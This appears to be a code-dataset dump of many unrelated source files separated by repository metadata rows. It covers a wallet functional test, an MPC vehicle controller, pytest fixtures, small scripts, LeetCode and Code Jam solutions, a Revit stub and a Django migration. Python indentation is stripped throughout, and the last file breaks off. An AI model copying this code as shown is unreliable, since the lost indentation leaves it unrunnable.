# assert_equal(uTx['amount'], Decimal('0'))
#assert(found)
#do some -walletbroadcast tests
self.stop_nodes()
self.start_node(0, ["-walletbroadcast=0"])
self.start_node(1, ["-walletbroadcast=0"])
self.start_node(2, ["-walletbroadcast=0"])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all([self.nodes[0:3]])
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3)) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal += 2
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
#restart the nodes with -walletbroadcast=1
self.stop_nodes()
self.start_node(0)
self.start_node(1)
self.start_node(2)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes[0:3])
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:3])
node_2_bal += 2
#tx should be added to balance because after restarting the nodes tx should be broadcastet
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
# This will raise an exception since generate does not accept a string
assert_raises_rpc_error(-1, "not an integer", self.nodes[0].generate, "2")
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all([self.nodes[0:3]])
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
listunspent = self.nodes[1].listunspent(1, 9999999, [], 3)
assert_array_result(listunspent,
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
#check if wallet or blochchain maintenance changes the balance
self.sync_all([self.nodes[0:3]])
blocks = self.nodes[0].generate(2)
self.sync_all([self.nodes[0:3]])
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
#'-salvagewallet',
]
chainlimit = 6
for m in maintenance:
self.log.info("check " + m)
self.stop_nodes()
# set lower ancestor limit for later
self.start_node(0, [m, "-limitancestorcount="+str(chainlimit)])
self.start_node(1, [m, "-limitancestorcount="+str(chainlimit)])
self.start_node(2, [m, "-limitancestorcount="+str(chainlimit)])
if m == '-reindex':
# reindex will leave rpc warm up "early"; Wait for it to finish
wait_until(lambda: [block_count] * 3 == [self.nodes[i].getblockcount() for i in range(3)])
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
if __name__ == '__main__':
WalletTest().main()
| 44.934375 | 170 | 0.635023 |
4a2259b126b8242be28484e3c2efa79be4496c66 | 15,053 | py | Python | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 18 | 2020-10-16T00:38:55.000Z | 2022-03-03T06:01:49.000Z | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 20 | 2020-07-23T03:50:50.000Z | 2021-11-09T04:00:26.000Z | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 140 | 2019-11-20T22:46:02.000Z | 2022-03-29T13:26:17.000Z | # References:
# https://github.com/asap-report/carla/blob/racetrack/PythonClient/racetrack
# /model_predictive_control.py
import logging
import numpy as np
import pandas as pd
import random
import sympy as sym
from pathlib import Path
from scipy.interpolate import splprep, splev
from scipy.optimize import minimize
from sympy.tensor.array import derive_by_array
from ROAR.control_module.controller import Controller
from ROAR.utilities_module.vehicle_models import VehicleControl, Vehicle
from ROAR.utilities_module .data_structures_models import Transform
from ROAR.agent_module.agent import Agent
class _EqualityConstraints(object):
"""Class for storing equality constraints in the MPC."""
def __init__(self, N, state_vars):
self.dict = {}
for symbol in state_vars:
self.dict[symbol] = N * [None]
def __getitem__(self, key):
return self.dict[key]
def __setitem__(self, key, value):
self.dict[key] = value
class VehicleMPCController(Controller):
def __init__(self,
agent: Agent,
route_file_path: Path, # read in route
target_speed=float("inf"),
steps_ahead=10,
max_throttle=1,
max_steering=1,
dt=0.1):
super().__init__(agent=agent)
self.logger = logging.getLogger(__name__)
# Read in route file
self.track_DF = pd.read_csv(route_file_path, header=None)
# Fit the route to a curve
spline_points = 10000
self.pts_2D = self.track_DF.loc[:, [0, 1]].values
tck, u = splprep(self.pts_2D.T, u=None, s=2.0, per=1, k=3)
u_new = np.linspace(u.min(), u.max(), spline_points)
x_new, y_new = splev(u_new, tck, der=0)
self.pts_2D = np.c_[x_new, y_new]
# Modified parm
self.prev_cte = 0
self.target_speed = target_speed
self.state_vars = ('x', 'y', 'v', 'ψ', 'cte', 'eψ')
self.steps_ahead = steps_ahead
self.dt = dt
# Cost function coefficients
self.cte_coeff = 100 # 100
self.epsi_coeff = 100 # 100
self.speed_coeff = 0.4 # 0.2
self.acc_coeff = 1 # 1
self.steer_coeff = 0.1 # 0.1
self.consec_acc_coeff = 50
self.consec_steer_coeff = 50
# Front wheel L
self.Lf = 2.5
# How the polynomial fitting the desired curve is fitted
self.steps_poly = 30 # modify to 3 when using 3D data
self.poly_degree = 3
# Bounds for the optimizer
self.bounds = (
6 * self.steps_ahead * [(None, None)]
+ self.steps_ahead * [(0, max_throttle)] # throttle bounds
+ self.steps_ahead * [(-max_steering, max_steering)]
# steer bounds
)
# State 0 placeholder
num_vars = (len(
self.state_vars) + 2) # State variables and two actuators
self.state0 = np.zeros(self.steps_ahead * num_vars)
# Lambdify and minimize stuff
self.evaluator = 'numpy'
self.tolerance = 1
self.cost_func, self.cost_grad_func, self.constr_funcs = \
self.get_func_constraints_and_bounds()
# To keep the previous state
self.steer = 0
self.throttle = 0
self.logger.debug("MPC Controller initiated")
# self.logger.debug(f" cost_func: {self.cost_func}")
# self.logger.debug(f" cost_grad_func: {self.cost_grad_func}")
# self.logger.debug(f" constr_funcs: {self.constr_funcs}")
def run_in_series(self, next_waypoint: Transform) -> VehicleControl:
super(VehicleMPCController, self).run_in_series(next_waypoint)
# get vehicle location (x, y)
# location = self.vehicle.transform.location
location = self.agent.vehicle.control.location
x, y = location.x, location.y
# get vehicle rotation
# rotation = self.vehicle.transform.rotation
rotation = self.agent.vehicle.control.rotation
ψ = rotation.yaw / 180 * np.pi # transform into radient
cos_ψ = np.cos(ψ)
sin_ψ = np.sin(ψ)
# get vehicle speed
# v = Vehicle.get_speed(self.vehicle)
v = Vehicle.get_speed(self.agent.vehicle)
# get next waypoint location
wx, wy = next_waypoint.location.x, next_waypoint.location.y
# debug logging
# self.logger.debug(f"car location: ({x}, {y})")
# self.logger.debug(f"car ψ: {ψ}")
# self.logger.debug(f"car speed: {v}")
# self.logger.debug(f"next waypoint: ({wx}, {wy})")
### 3D ###
# get the index of next waypoint
# waypoint_index = self.get_closest_waypoint_index_3D(location,
# next_waypoint.location)
# # find more waypoints index to fit a polynomial
# waypoint_index_shifted = waypoint_index - 2
# indeces = waypoint_index_shifted + self.steps_poly * np.arange(
# self.poly_degree + 1)
# indeces = indeces % self.track_DF.shape[0]
# # get waypoints for polynomial fitting
# pts = np.array([[self.track_DF.iloc[i][0], self.track_DF.iloc[i][
# 1]] for i in indeces])
### 2D ###
index_2D = self.get_closest_waypoint_index_2D(location,
next_waypoint.location)
index_2D_shifted = index_2D - 5
indeces_2D = index_2D_shifted + self.steps_poly * np.arange(
self.poly_degree + 1)
indeces_2D = indeces_2D % self.pts_2D.shape[0]
pts = self.pts_2D[indeces_2D]
# self.logger.debug(f'\nwaypoint index:\n {index_2D}')
# self.logger.debug(f'\nindeces:\n {indeces_2D}')
# transform waypoints from world to car coorinate
pts_car = VehicleMPCController.transform_into_cars_coordinate_system(
pts,
x,
y,
cos_ψ,
sin_ψ
)
# fit the polynomial
poly = np.polyfit(pts_car[:, 0], pts_car[:, 1], self.poly_degree)
# Debug
# self.logger.debug(f'\nwaypoint index:\n {waypoint_index}')
# self.logger.debug(f'\nindeces:\n {indeces}')
# self.logger.debug(f'\npts for poly_fit:\n {pts}')
# self.logger.debug(f'\npts_car:\n {pts_car}')
###########
cte = poly[-1]
eψ = -np.arctan(poly[-2])
init = (0, 0, 0, v, cte, eψ, *poly)
self.state0 = self.get_state0(v, cte, eψ, self.steer, self.throttle,
poly)
result = self.minimize_cost(self.bounds, self.state0, init)
# self.steer = -0.6 * cte - 5.5 * (cte - self.prev_cte)
# self.prev_cte = cte
# self.throttle = VehicleMPCController.clip_throttle(self.throttle,
# v, self.target_speed)
control = VehicleControl()
if 'success' in result.message:
self.steer = result.x[-self.steps_ahead]
self.throttle = result.x[-2 * self.steps_ahead]
else:
self.logger.debug('Unsuccessful optimization')
control.steering = self.steer
control.throttle = self.throttle
return control
def get_func_constraints_and_bounds(self):
"""
Defines MPC's cost function and constraints.
"""
# Polynomial coefficients will also be symbolic variables
poly = self.create_array_of_symbols('poly', self.poly_degree + 1)
# Initialize the initial state
x_init = sym.symbols('x_init')
y_init = sym.symbols('y_init')
ψ_init = sym.symbols('ψ_init')
v_init = sym.symbols('v_init')
cte_init = sym.symbols('cte_init')
eψ_init = sym.symbols('eψ_init')
init = (x_init, y_init, ψ_init, v_init, cte_init, eψ_init)
# State variables
x = self.create_array_of_symbols('x', self.steps_ahead)
y = self.create_array_of_symbols('y', self.steps_ahead)
ψ = self.create_array_of_symbols('ψ', self.steps_ahead)
v = self.create_array_of_symbols('v', self.steps_ahead)
cte = self.create_array_of_symbols('cte', self.steps_ahead)
eψ = self.create_array_of_symbols('eψ', self.steps_ahead)
# Actuators
a = self.create_array_of_symbols('a', self.steps_ahead)
δ = self.create_array_of_symbols('δ', self.steps_ahead)
vars_ = (
# Symbolic arrays (but NOT actuators)
*x, *y, *ψ, *v, *cte, *eψ,
# Symbolic arrays (actuators)
*a, *δ,
)
cost = 0
for t in range(self.steps_ahead):
cost += (
# Reference state penalties
self.cte_coeff * cte[t] ** 2
+ self.epsi_coeff * eψ[t] ** 2 +
+ self.speed_coeff * (v[t] - self.target_speed) ** 2
# Actuator penalties
+ self.acc_coeff * a[t] ** 2
+ self.steer_coeff * δ[t] ** 2
)
# Penalty for differences in consecutive actuators
for t in range(self.steps_ahead - 1):
cost += (
self.consec_acc_coeff * (a[t + 1] - a[t]) ** 2
+ self.consec_steer_coeff * (δ[t + 1] - δ[t]) ** 2
)
# Initialize constraints
eq_constr = _EqualityConstraints(self.steps_ahead, self.state_vars)
eq_constr['x'][0] = x[0] - x_init
eq_constr['y'][0] = y[0] - y_init
eq_constr['ψ'][0] = ψ[0] - ψ_init
eq_constr['v'][0] = v[0] - v_init
eq_constr['cte'][0] = cte[0] - cte_init
eq_constr['eψ'][0] = eψ[0] - eψ_init
for t in range(1, self.steps_ahead):
curve = sum(
poly[-(i + 1)] * x[t - 1] ** i for i in range(len(poly)))
# The desired ψ is equal to the derivative of the polynomial
# curve at
# point x[t-1]
ψdes = sum(poly[-(i + 1)] * i * x[t - 1] ** (i - 1) for i in
range(1, len(poly)))
eq_constr['x'][t] = x[t] - (
x[t - 1] + v[t - 1] * sym.cos(ψ[t - 1]) * self.dt)
eq_constr['y'][t] = y[t] - (
y[t - 1] + v[t - 1] * sym.sin(ψ[t - 1]) * self.dt)
eq_constr['ψ'][t] = ψ[t] - (
ψ[t - 1] - v[t - 1] * δ[t - 1] / self.Lf * self.dt)
eq_constr['v'][t] = v[t] - (v[t - 1] + a[t - 1] * self.dt)
eq_constr['cte'][t] = cte[t] - (
curve - y[t - 1] + v[t - 1] * sym.sin(
eψ[t - 1]) * self.dt)
eq_constr['eψ'][t] = eψ[t] - (ψ[t - 1] - ψdes - v[t - 1] * δ[
t - 1] / self.Lf * self.dt)
# Generate actual functions from
cost_func = self.generate_fun(cost, vars_, init, poly)
cost_grad_func = self.generate_grad(cost, vars_, init, poly)
constr_funcs = []
for symbol in self.state_vars:
for t in range(self.steps_ahead):
func = self.generate_fun(eq_constr[symbol][t], vars_, init,
poly)
grad_func = self.generate_grad(eq_constr[symbol][t], vars_,
init, poly)
constr_funcs.append(
{'type': 'eq', 'fun': func, 'jac': grad_func,
'args': None},
)
return cost_func, cost_grad_func, constr_funcs
def generate_fun(self, symb_fun, vars_, init, poly):
"""
Generates a function of the form `fun(x, *args)`
"""
args = init + poly
return sym.lambdify((vars_, *args), symb_fun, self.evaluator)
def generate_grad(self, symb_fun, vars_, init, poly):
"""
TODO: add comments
"""
args = init + poly
return sym.lambdify(
(vars_, *args),
derive_by_array(symb_fun, vars_ + args)[:len(vars_)],
self.evaluator
)
def get_state0(self, v, cte, epsi, a, delta, poly):
a = a or 0
delta = delta or 0
x = np.linspace(0, 1, self.steps_ahead)
y = np.polyval(poly, x)
psi = 0
self.state0[:self.steps_ahead] = x
self.state0[self.steps_ahead:2 * self.steps_ahead] = y
self.state0[2 * self.steps_ahead:3 * self.steps_ahead] = psi
self.state0[3 * self.steps_ahead:4 * self.steps_ahead] = v
self.state0[4 * self.steps_ahead:5 * self.steps_ahead] = cte
self.state0[5 * self.steps_ahead:6 * self.steps_ahead] = epsi
self.state0[6 * self.steps_ahead:7 * self.steps_ahead] = a
self.state0[7 * self.steps_ahead:8 * self.steps_ahead] = delta
return self.state0
def minimize_cost(self, bounds, x0, init):
for constr_func in self.constr_funcs:
constr_func['args'] = init
return minimize(
fun=self.cost_func,
x0=x0,
args=init,
jac=self.cost_grad_func,
bounds=bounds,
constraints=self.constr_funcs,
method='SLSQP',
tol=self.tolerance,
)
def get_closest_waypoint_index_3D(self, car_location, waypoint_location):
"""Get the index of the closest waypoint in self.track_DF
car_location: current car location
waypoint_location: next_waypoint
"""
index = self.track_DF.loc[(self.track_DF[0] == waypoint_location.x)
& (self.track_DF[
1] == waypoint_location.y)].index
if len(index) > 0:
return index[0]
else:
location_arr = np.array([
car_location.x,
car_location.y,
car_location.z,
])
dists = np.linalg.norm(self.track_DF - location_arr, axis=1)
return np.argmin(dists)
def get_closest_waypoint_index_2D(self, car_location, waypoint_location):
"""Get the index of the closest waypoint in self.pts_2D
Note: it may give wrong index when the route is overlapped
"""
location_arr = np.array([
car_location.x,
car_location.y
])
dists = np.linalg.norm(self.pts_2D - location_arr, axis=1)
return np.argmin(dists)
@staticmethod
def create_array_of_symbols(str_symbol, N):
return sym.symbols('{symbol}0:{N}'.format(symbol=str_symbol, N=N))
@staticmethod
def transform_into_cars_coordinate_system(pts, x, y, cos_ψ, sin_ψ):
diff = (pts - [x, y])
pts_car = np.zeros_like(diff)
pts_car[:, 0] = cos_ψ * diff[:, 0] + sin_ψ * diff[:, 1]
pts_car[:, 1] = sin_ψ * diff[:, 0] - cos_ψ * diff[:, 1]
return pts_car
@staticmethod
def clip_throttle(throttle, curr_speed, target_speed):
return np.clip(
throttle - 0.01 * (curr_speed - target_speed),
0.4,
0.9
)
| 36.804401 | 77 | 0.558095 |
4a2259c12397fcbfe2aec9fa7ba9fa424dc96457 | 48 | py | Python | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 3 | 2015-09-10T15:18:53.000Z | 2016-06-18T14:12:36.000Z | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 2 | 2020-05-28T11:08:30.000Z | 2021-03-31T18:40:30.000Z | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 1 | 2020-01-29T09:20:11.000Z | 2020-01-29T09:20:11.000Z | from .page import Page
from .table import Table
| 16 | 24 | 0.791667 |
4a225afe7fa62e4f02d032e68a96825610ae27a7 | 844 | py | Python | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | 1 | 2020-08-06T16:54:55.000Z | 2020-08-06T16:54:55.000Z | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | 77 | 2020-09-03T09:05:10.000Z | 2022-03-17T10:04:09.000Z | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | null | null | null |
# File Validation for the Attachments
"""
* valid_extensions - list containing allowed file extensions. Example: ['.pdf', '.jpg']
* valid_mime_types - list containing allowed content_types. Example: ['application/pdf', 'image/jpeg']
* max_size - a number indicating the maximum file size allowed for upload.
2.5MB - 2621440
5MB - 5242880
10MB - 10485760
20MB - 20971520
50MB - 5242880
100MB 104857600
250MB - 214958080
500MB - 429916160
"""
VALID_FILE_EXTENSIONS = ['.pdf']
MAX_FILE_SIZE = 5242880 # 5 MB of file size max
VALID_MIME_TYPES = ['application/pdf']
# File Validation for the Attachments
# Image Upload Resize Width
# Resize height is calculated in the view during resize
MAX_RESIZE_WIDTH = 800 # max image of 800x600
MAX_RESIZE_HEIGHT = 600 # max image of 800x600
# Image Upload Resize Width
| 30.142857 | 102 | 0.728673 |
4a225c855191c0d64b279524c5d97f542e2ed5af | 1,738 | py | Python | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | 10 | 2016-09-14T22:00:02.000Z | 2019-01-28T21:58:42.000Z | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | null | null | null | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | null | null | null | import pytest
# here's a little voodoo -- any generic tests depend on this 'framework'
# fixture, which (sneakily using internal-only APIs) ensures that each
# tests runs twice: once enabled for Twisted and once enabled for
# asyncio.
#
# ...but there's a catch: not all environments support both, so we
# catch ImportError and skip those tests.
#
# To write a test that only works on one or the other framework, use
# the framework_tx or framework_aio fixtures instead
@pytest.fixture(
params=['twisted', 'asyncio'],
)
def framework(request):
"""
This is a framework that uses txaio internals to set up a
framework to use, as the 'official' way is to call .use_twisted()
or .use_asyncio() -- but we want to test with both frameworks if
they're available.
"""
try:
if request.param == 'twisted':
return framework_tx()
elif request.param == 'asyncio':
return framework_aio()
except ImportError:
pytest.skip()
@pytest.fixture
def framework_uninitialized():
import txaio
from txaio import _unframework
txaio._use_framework(_unframework)
txaio._explicit_framework = None
return _unframework
@pytest.fixture
def framework_tx():
try:
import txaio
from txaio import tx
tx._loggers = set()
txaio._use_framework(tx)
txaio._explicit_framework = 'twisted'
return tx
except ImportError:
pytest.skip()
@pytest.fixture
def framework_aio():
try:
import txaio
from txaio import aio
aio._loggers = set()
txaio._use_framework(aio)
txaio._explicit_framework = 'asyncio'
return aio
except ImportError:
pytest.skip()
| 25.558824 | 72 | 0.665708 |
4a225cdfadeae0dacb1354c2e8e826ad47fb0bb5 | 635 | py | Python | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | 8 | 2021-09-15T15:17:38.000Z | 2022-03-18T14:11:58.000Z | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | null | null | null | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | 2 | 2021-09-16T14:22:45.000Z | 2021-09-20T18:55:05.000Z | from PIL import Image
import PIL
from os import listdir
from os.path import isfile, join
##fake
mypath = './face_fake_predict/'
folder_save = './eye_corpped_fake_predict/'
left = 287
top = 440
right = left + 450
bottom = top + 100
def get_all_file():
file_list = [mypath + f for f in listdir(mypath) if ('.jpeg' in f)]
file_list.sort()
return (file_list)
def crop_image(path):
print(path)
im = Image.open(path)
im = im.crop((left, top, right, bottom))
path = path.split("/")
im.save(folder_save + path[-1])
image_list = get_all_file()
print(image_list)
for i in image_list:
crop_image(str(i)) | 20.483871 | 71 | 0.672441 |
4a225d35fd7aeb0b44ad803dcaca2fdb51f0d8e9 | 685 | py | Python | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
dict_val = {}
result1 = []
result2 = []
for val in nums:
dict_val[val] = dict_val.get(val, 0) + 1
if dict_val[val] > 1:
result1.append(val)
else:
result2.append(val)
return set(result2)-set(result1)
class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
dict_val = {}
result1 = []
result2 = []
for val in nums:
dict_val[val] = dict_val.get(val, 0) + 1
return [k for k, v in sorted(dict_val.items(), key=lambda item: item[1])][:2]
| 29.782609 | 85 | 0.510949 |
4a225daf881b4e60b1ee50ce5dd32bca4c0927e4 | 1,272 | py | Python | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | import requests
import json
from datetime import datetime
import time
"""This file illustrates the typical calls you need from an http client.
More specifically, in your signal_processing.py code, you should have a
request.post() call everytime a movement is classified by your algorithm."""
if __name__ == '__main__':
# This header sets the HTTP request's mimetype to `application/json`. This
# means the payload of the HTTP message will be formatted as a json ojbect
hdr = {
'Content-Type': 'application/json',
'Authorization': None #not using HTTP secure
}
# The payload of our message starts as a simple dictionary. Before sending
# the HTTP message, we will format this into a json object
payload = {
'time': str(datetime.now()),
'event': "Moving Right"
}
while True:
# Send an HTTP POST message and block until a response is given.
# Note: requests() is NOT the same thing as request() under the flask
# library.
response = requests.post("http://0.0.0.0:5000/post-event", headers = hdr,
data = json.dumps(payload))
# Print the json object from the HTTP response
print(response.json())
time.sleep(2)
| 33.473684 | 81 | 0.654874 |
4a225e335db7cc764d86099e881896e4083e6576 | 981 | py | Python | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | denfromufa/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2017-07-07T11:15:45.000Z | 2017-07-07T11:15:45.000Z | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class DigitGroupingAmount(Enum,IComparable,IFormattable,IConvertible):
"""
The number of digits in each group when numbers are formatted with digit grouping.
enum DigitGroupingAmount,values: Three (1),Two (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Three=None
Two=None
value__=None
| 28.852941 | 215 | 0.667686 |
4a225e7671a95988f6f9452c6d26d5f01d3da1ad | 48 | py | Python | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | # Enter your API key
api_key = "YOUR KEY HERE!"
| 16 | 26 | 0.6875 |
4a225eba0223eda7bb3b9a28af9d49e1e8db94cf | 380 | py | Python | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | null | null | null | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | 8 | 2019-06-22T09:20:38.000Z | 2022-02-10T11:35:45.000Z | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-06-26 17:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0019_auto_20190626_1735'),
]
operations = [
migrations.AddField(
model_name='review',
name='rating',
field=models.IntegerField(default=0),
),
]
| 20 | 49 | 0.592105 |
4a225ee588dd34c73a8181d6955fda284df5b3c3 | 1,234 | py | Python | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | '''
Question Link: https://codingcompetitions.withgoogle.com/codejam/round/0000000000877ba5/0000000000aa8e9c
Solution Explanation:
1. https://www.youtube.com/watch?v=ZdpSR4L09NI&ab_channel=HappyCoding
'''
from multiprocessing import pool
import copy
import sys
class Solution:
def doubleOrOne(self, stringExp):
res = ""
last = '\0'
cnt = 0
for i in range(len(stringExp)):
print(f"i:{i}, string[i]:{stringExp[i]}, last:{last}, last<str[i]?:{last < stringExp[i]}, cnt:{cnt}")
if stringExp[i] != last:
if(last < stringExp[i]):
cnt*=2
print(f"cnt:{cnt}", end=" ")
while cnt>0:
cnt -=1
res += last
print(f", res:{res}")
last = stringExp[i]
cnt = 0
cnt +=1
while cnt>0:
cnt -=1
res += last
print(res)
stringLink = [
"PEEL",
"AAAAAAAAAA",
"CODEJAMDAY",
]
solution = Solution()
for id, stringExp in enumerate(stringLink):
print(f'Case #{id+1}:',end = ' ')
solution.doubleOrOne(stringExp) | 26.255319 | 113 | 0.497569 |
4a225f6e3f5144c86a172bb65bf0969cbe8df0af | 1,987 | py | Python | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | import argparse
import time
import arvados
import arvados.collection
import json
import magic
from pathlib import Path
import urllib.request
import socket
import getpass
from .qc_metadata import qc_metadata
from .qc_fasta import qc_fasta
ARVADOS_API_HOST='lugli.arvadosapi.com'
